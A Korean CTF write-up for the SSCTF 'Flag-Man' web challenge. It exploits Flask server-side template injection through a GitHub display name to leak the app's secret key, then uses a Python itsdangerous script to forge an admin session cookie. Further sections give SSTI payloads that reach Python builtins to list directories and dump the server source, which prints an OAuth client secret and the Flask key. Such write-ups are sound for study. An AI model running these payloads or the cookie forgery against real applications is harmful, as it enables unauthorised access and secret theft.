[SSCTF] Flag-Man - Web (400)

Flag-Man

 

Github 아이콘과 함께 login 그리고 오직 / and /user 만 있고 다른 페이지는 없다고 한다. (callback은?)

문제에서 주어진 /user 에도 이동해보면 달랑 please login first. 만 있는 줄 알았는데 마우스로 드래그해보면 Flask로 동작하고 있다는 것을 알 수 있다.

login을 눌러보면 내 Github 계정의 권한을 요청한다.

요청을 허가하고 나면 /user/ 에 접근이 가능하고 Github 계정 사진 정보와 uid, id 번호 값을 가져오는 것을 알 수 있고 쿠키를 확인해보면 그전에 없던 session 이라는 것이 생성되어 있는 것을 알 수 있다.

session: eyJpbmZvIjpbMiwiZG85ZGFyayIsMTY1MDgzNzAsImh0dHBzOi8vYXZhdGFycy5naXRodWJ1c2VyY29udGVudC5jb20vdS8xNjUwODM3MD92PTMiXX0.CboUGA.DMsNeQ_SEk_MIfxUjONDCUm-kyw

위 값을 base64 로 디코딩해보면 아래와 같은 값을 알 수 있다.

{"info":[2,"do9dark",16508370,"https://avatars.githubusercontent.com/u/16508370?v=3"]}n�3,5�C#8��Ri2

앞 부분은 읽는 게 가능하지만 뒷 부분은 그렇지 않은 것을 알 수 있고 session 을 보면 .(dot)을 기준으로 첫 번째 구간의 값이 정상적으로 디코딩 된 데이터와 매칭되는 것을 알 수 있다. 

여기에서 풀이를 보면 {{app.secret_key}} 값을 얻어내야하는데, 그 부분을 잘 모르겠습니다...누가 좀 알려주세요 ㅠ_ㅜ

시간이 없어서 우선 풀이에 있는 secret_key 값을 이용하였다.

[+] Thanks to  @deadbeef

문제 서버에서 Github의 계정 정보를 가져오기 때문에 Github의 계정 이름 부분을 직접적으로 변경해준다.

Name 부분에 {{app.secret_key}}을 추가해준다.

다시 정보를 가져와보면 {{app.secret_key}} 값을 가져온 것을 확인할 수 있다.

session 의 값을 정상적으로 풀어서 확인해보고 정상적으로 풀렸다면 반대로 해당 데이터의 값을 변조해서 다시 서명을 한다. (id 값을 2에서 1로 변경해준다.)

해당 코드는 아래와 같다.

sign.py:

# pip install itsdangerous
from itsdangerous import URLSafeTimedSerializer
# pip install flask
from flask.sessions import TaggedJSONSerializer
 
import hashlib
 
val = "eyJpbmZvIjpbMiwiZG85ZGFyayIsMTY1MDgzNzAsImh0dHBzOi8vYXZhdGFycy5naXRodWJ1c2VyY29udGVudC5jb20vdS8xNjUwODM3MD92PTMiXX0.CboUGA.DMsNeQ_SEk_MIfxUjONDCUm-kyw"
secret_key = 'sflkgjsiotu2rjdskjfnpwq9rwrehnpqwd0i2ruruogh9723yrhbfnkdsjl'
salt = 'cookie-session'
serializer = TaggedJSONSerializer()
signer_kwargs = dict(
    key_derivation = 'hmac',
    digest_method = hashlib.sha1
)
 
s = URLSafeTimedSerializer(secret_key, salt=salt, serializer=serializer, signer_kwargs=signer_kwargs)
 
print s.loads(val)
 
new = s.loads(val)
new['info'][0] = 1
print s.dumps(new)

결과:

첫 번째 줄에 정상적으로 풀린 것을 볼 수 있고 두 번째 줄에는 2를 1로 변경해서 다시 서명한 session 값이다.

session: eyJpbmZvIjpbMSwiZG85ZGFyayIsMTY1MDgzNzAsImh0dHBzOi8vYXZhdGFycy5naXRodWJ1c2VyY29udGVudC5jb20vdS8xNjUwODM3MD92PTMiXX0.CboZfA.9isMF0fsxeylkk4UJaqSs_JQaBI

이 값을 이용해서 쿠키를 변조해주면 Flag를 얻을 수 있다.

Flag: SSCTF{dc28c39697058241d924be06462c2040}

[+] 다른 방법 (1)

{{app.secret_key}}와 같이 플라스크 내부 값을 가져오는 것 뿐만 아니라 다양한 것들을 할 수 있다.

Name = do9dark {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}{{loop.index0}}{% endif %}{% endfor %}

>> name:do9dark 59

Name = do9dark {{[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['os'].path.realpath(__file__)}}

>> name:do9dark /data1/www/htdocs/259/4083475a59f34e34/2/ssctf.py

Name = do9dark {{[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['__builtins__'].open("/data1/www/htdocs/259/4083475a59f34e34/2/ssctf.py","r").read()}}

>> name:do9dark

# -*- coding: utf-8 -*-
from flask import Flask,abort,request,session,redirect,render_template_string
import os
import json
import datetime
import urllib
import re
import time
import hashlib
#import sqlite3
import threading
from rauth.service import OAuth2Service
 
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
DEBUG = os.name =='nt'
if DEBUG:
    WEBHOME = 'http://127.0.0.1/'
else:
    WEBHOME = 'http://b525ac59.seclover.com/'
 
github = OAuth2Service(
    name='github',
    base_url='https://api.github.com/',
    access_token_url='https://github.com/login/oauth/access_token',
    authorize_url='https://github.com/login/oauth/authorize',
    client_id= '6ad5ab3c971c740adf64',
    client_secret= 'd6aed929c3b9bf713a37435c117619dcd46194e1',
)
 
app = Flask(__name__)
app.debug = DEBUG
app.secret_key = "sflkgjsiotu2rjdskjfnpwq9rwrehnpqwd0i2ruruogh9723yrhbfnkdsjl"
app.flagman = (1,'flagman','SSCTF{dc28c39697058241d924be06462c2040}','http://www.seclover.com/wp-content/uploads/2015/07/logo.png')
# app.lastid = 1
# app.lock = threading.Lock()
# def getnewid():
#     app.lock.acquire()
#     app.lastid+=1
#     newid = app.lastid 
#     app.lock.release()
#     return newid
 
# def dbinsert(name,uid,pic):
#     newid = getnewid()
#     app.user[newid] = (name,uid,pic)
#     return newid
# def dbfind(user_id):
#     userinfo = app.user.get(user_id)
#     if userinfo:
#         return (user_id,)+userinfo
#     return None
 
# def dbfind_uid(uid):
#     for u in app.user:
#         if app.user[u][1]==uid:
#             return (u,)+app.user[u]
#     return None
# app.dbcon = sqlite3.connect(":memory:", check_same_thread=False)
# app.dbcur = app.dbcon.cursor()
# app.dbcur.executescript('''CREATE TABLE "user" (
# "id"  INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
# "name"  TEXT,
# "uid"  TEXT,
# "pic"  TEXT
# )
# ;
 
# CREATE UNIQUE INDEX "id"
# ON "user" ("id" ASC);
 
# CREATE UNIQUE INDEX "uid"
# ON "user" ("uid" ASC);
 
# ''')
 
 
 
# def dbinsert(name,uid,pic):
#     sql = '''INSERT INTO "user" ("name", "uid", "pic") VALUES (?,?,?);'''
#     app.dbcur.execute(sql,(name,uid,pic))
#     app.dbcon.commit()
#     return app.dbcur.lastrowid
# def dbfind(user_id):
#     sql = '''SELECT * FROM "user" where id = ?'''
#     rows = app.dbcur.execute(sql,(user_id,))
#     for id,name,realuid,pic in rows:
#         return (id,name,realuid,pic)
#     return None
 
# dbinsert('howmp','uid','http://www.seclover.com/wp-content/uploads/2015/07/logo.png')
 
 
@app.route('/user/')
def user():
    userinfo = session.get('info')
    if not userinfo:
        #session.pop('info')
        return "please <a href='/'>login</a> first.<br><b style='color: white;'>Powered by Flask/0.11.2</b>"
    user_id,name,realuid,pic = userinfo
    if user_id == 1:
        user_id,name,realuid,pic = app.flagman
    name = str(name)
    pic = str(pic)
    template = u'''<img src="{{pic}}" /><br><lable>name:''' + name + '</lable><br><lable>uid:{{ realuid }}</lable><br><lable>id:{{ user_id }}</lable>'
    #template += u"<br>{{app.secret_key}}"
    return render_template_string(template,**(dict(globals(), **locals())))
 
 
@app.route('/')
def index():
    def _link():
        params = {'redirect_uri': WEBHOME+'callback'}
        icon = u'<img src="https://developer.github.com/assets/images/status-icon-good.png" />'
        return """<div>
        <a href="%s">%s</a>
        </div>""" % (github.get_authorize_url(**params), icon)
 
    html = """<!DOCTYPE html>
    <html>
        <body>%slogin<br>only <code>/</code> and <code>/user</code>,no other pages!</body>
    </html>
    """ % _link()
    return html
 
@app.route('/callback')
def callback():
    code = request.args.get('code')
    if not code:
        abort(401)
    data = dict(code=request.args['code'],
            redirect_uri=WEBHOME+'callback',
            )
    try:
        auth = github.get_auth_session(data=data)
        me = auth.get('user').json()
        session['info']=[2,me['name'],me['id'],me['avatar_url']]
        return redirect('/user/')
    except Exception,e:
        return e
if __name__ == '__main__':
    app.run(host='0.0.0.0',port=80)

[+] 다른 방법 (2)

Name = do9dark {{app.flagman}}

>> name:do9dark (1, 'flagman', 'SSCTF{dc28c39697058241d924be06462c2040}', 'http://www.seclover.com/wp-content/uploads/2015/07/logo.png')

[+] 다른 방법 (3)

Name = do9dark {%for c in [].__class__.__base__.__subclasses__()%}{%if c.__name__=='catch_warnings'%}{{c.__init__.func_globals['linecache'].__dict__['__builtins__'].open('ssctf.py').read()}}{%endif%}{%endfor%}

>> name:do9dark # -*- coding: utf-8 -*- from flask import Flask,abort,request,session,redirect,render_template_string import os import json import datetime import urllib import re import time import hashlib #import sqlite3 import threading from rauth.service import OAuth2Service BASE_DIR = os.path.dirname(os.path.abspath(__file__)) DEBUG = os.name =='nt' if DEBUG: WEBHOME = 'http://127.0.0.1/' else: WEBHOME = 'http://b525ac59.seclover.com/' github = OAuth2Service( name='github', base_url='https://api.github.com/', access_token_url='https://github.com/login/oauth/access_token', authorize_url='https://github.com/login/oauth/authorize', client_id= '6ad5ab3c971c740adf64', client_secret= 'd6aed929c3b9bf713a37435c117619dcd46194e1', ) app = Flask(__name__) app.debug = DEBUG app.secret_key = "sflkgjsiotu2rjdskjfnpwq9rwrehnpqwd0i2ruruogh9723yrhbfnkdsjl" app.flagman = (1,'flagman','SSCTF{dc28c39697058241d924be06462c2040}','http://www.seclover.com/wp-content/uploads/2015/07/logo.png') # app.lastid = 1 # app.lock = threading.Lock() # def getnewid(): # app.lock.acquire() # app.lastid+=1 # newid = app.lastid # app.lock.release() # return newid # def dbinsert(name,uid,pic): # newid = getnewid() # app.user[newid] = (name,uid,pic) # return newid # def dbfind(user_id): # userinfo = app.user.get(user_id) # if userinfo: # return (user_id,)+userinfo # return None # def dbfind_uid(uid): # for u in app.user: # if app.user[u][1]==uid: # return (u,)+app.user[u] # return None # app.dbcon = sqlite3.connect(":memory:", check_same_thread=False) # app.dbcur = app.dbcon.cursor() # app.dbcur.executescript('''CREATE TABLE "user" ( # "id" INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, # "name" TEXT, # "uid" TEXT, # "pic" TEXT # ) # ; # CREATE UNIQUE INDEX "id" # ON "user" ("id" ASC); # CREATE UNIQUE INDEX "uid" # ON "user" ("uid" ASC); # ''') # def dbinsert(name,uid,pic): # sql = '''INSERT INTO "user" ("name", "uid", "pic") VALUES (?,?,?);''' # app.dbcur.execute(sql,(name,uid,pic)) # app.dbcon.commit() # return app.dbcur.lastrowid # def dbfind(user_id): # sql = '''SELECT * FROM "user" where id = ?''' # rows = app.dbcur.execute(sql,(user_id,)) # for id,name,realuid,pic in rows: # return (id,name,realuid,pic) # return None # dbinsert('howmp','uid','http://www.seclover.com/wp-content/uploads/2015/07/logo.png') @app.route('/user/') def user(): userinfo = session.get('info') if not userinfo: #session.pop('info') return "please login first.

... (생략)

[+] 다른 방법 (4)

Name = do9dark {{os.getcwd()}}

>> name:do9dark /data1/www/htdocs/259/4083475a59f34e34/2

Name = do9dark {{os.listdir('.')}}

>> do9dark ['requests', 'rauth', 'config.yaml', 'itsdangerous.py', 'flask', 'index.wsgi', 'ssctf.py']

Name = do9dark {{__builtins__.open("ssctf.py").read()}}

>> name:do9dark # -*- coding: utf-8 -*- from flask import Flask,abort,request,session,redirect,render_template_string import os import json import datetime import urllib import re import time import hashlib #import sqlite3 import threading from rauth.service import OAuth2Service BASE_DIR = os.path.dirname(os.path.abspath(__file__)) DEBUG = os.name =='nt' if DEBUG: WEBHOME = 'http://127.0.0.1/' else: WEBHOME = 'http://b525ac59.seclover.com/' github = OAuth2Service( name='github', base_url='https://api.github.com/', access_token_url='https://github.com/login/oauth/access_token', authorize_url='https://github.com/login/oauth/authorize', client_id= '6ad5ab3c971c740adf64', client_secret= 'd6aed929c3b9bf713a37435c117619dcd46194e1', ) app = Flask(__name__) app.debug = DEBUG app.secret_key = "sflkgjsiotu2rjdskjfnpwq9rwrehnpqwd0i2ruruogh9723yrhbfnkdsjl" app.flagman = (1,'flagman','SSCTF{dc28c39697058241d924be06462c2040}','http://www.seclover.com/wp-content/uploads/2015/07/logo.png') # app.lastid = 1 # app.lock = threading.Lock() # def getnewid(): # app.lock.acquire() # app.lastid+=1 # newid = app.lastid # app.lock.release() # return newid # def dbinsert(name,uid,pic): # newid = getnewid() # app.user[newid] = (name,uid,pic) # return newid # def dbfind(user_id): # userinfo = app.user.get(user_id) # if userinfo: # return (user_id,)+userinfo # return None # def dbfind_uid(uid): # for u in app.user: # if app.user[u][1]==uid: # return (u,)+app.user[u] # return None # app.dbcon = sqlite3.connect(":memory:", check_same_thread=False) # app.dbcur = app.dbcon.cursor() # app.dbcur.executescript('''CREATE TABLE "user" ( # "id" INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, # "name" TEXT, # "uid" TEXT, # "pic" TEXT # ) # ; # CREATE UNIQUE INDEX "id" # ON "user" ("id" ASC); # CREATE UNIQUE INDEX "uid" # ON "user" ("uid" ASC); # ''') # def dbinsert(name,uid,pic): # sql = '''INSERT INTO "user" ("name", "uid", "pic") VALUES (?,?,?);''' # app.dbcur.execute(sql,(name,uid,pic)) # app.dbcon.commit() # return app.dbcur.lastrowid # def dbfind(user_id): # sql = '''SELECT * FROM "user" where id = ?''' # rows = app.dbcur.execute(sql,(user_id,)) # for id,name,realuid,pic in rows: # return (id,name,realuid,pic) # return None # dbinsert('howmp','uid','http://www.seclover.com/wp-content/uploads/2015/07/logo.png') @app.route('/user/') def user(): userinfo = session.get('info') if not userinfo: #session.pop('info') return "please login first.

... (생략)